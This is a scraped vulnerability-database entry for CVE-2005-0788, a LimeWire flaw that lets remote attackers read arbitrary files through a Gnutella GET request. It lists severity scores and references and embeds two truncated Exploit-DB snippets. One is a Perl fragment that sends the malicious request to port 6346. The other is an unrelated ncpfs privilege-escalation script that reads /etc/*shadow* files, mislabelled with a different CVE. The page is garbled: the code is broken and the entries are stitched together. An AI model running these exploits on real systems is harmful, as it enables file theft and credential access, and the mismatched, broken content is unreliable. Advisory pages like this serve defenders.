CVE-2005-0788
published 2005-03-14CVE-2005-0788: LimeWire 4.1.2 through 4.5.6 allows remote attackers to read arbitrary files by specifying the full pathname in a Gnutella GET request.
PriorityP433medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
6.92%
93.3th percentile
LimeWire 4.1.2 through 4.5.6 allows remote attackers to read arbitrary files by specifying the full pathname in a Gnutella GET request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| limewire | limewire | — | — |
| limewire | limewire | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read
exploitdb·2005-03-14
CVE-2005-0788 LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read
LimeWire 4.1.2 new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";
print $web "@req";
while ( )
{ print }
close $web;
}
# milw0rm.com [2005-03-14]
Exploit-DB
ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
exploitdb·2005-01-30
CVE-2010-0788 ncpfs < 2.2.6 (Gentoo / Linux) - Local Privilege Escalation
ncpfs /dev/null
(echo $1
ncpmount $MNTDIR
echo)
(rmdir $MNTDIR
rm ~/.nwclient
mv .nwclient.temp .nwclient)2>/dev/null)}
(for i in /etc/*shadow*
do head1 $i
done)))#
# milw0rm.com [2005-01-30]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111082448213238&w=2http://secunia.com/advisories/14555/http://www.gentoo.org/security/en/glsa/glsa-200503-37.xmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/19693http://marc.info/?l=bugtraq&m=111082448213238&w=2http://secunia.com/advisories/14555/http://www.gentoo.org/security/en/glsa/glsa-200503-37.xmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/19693
2005-03-14
Published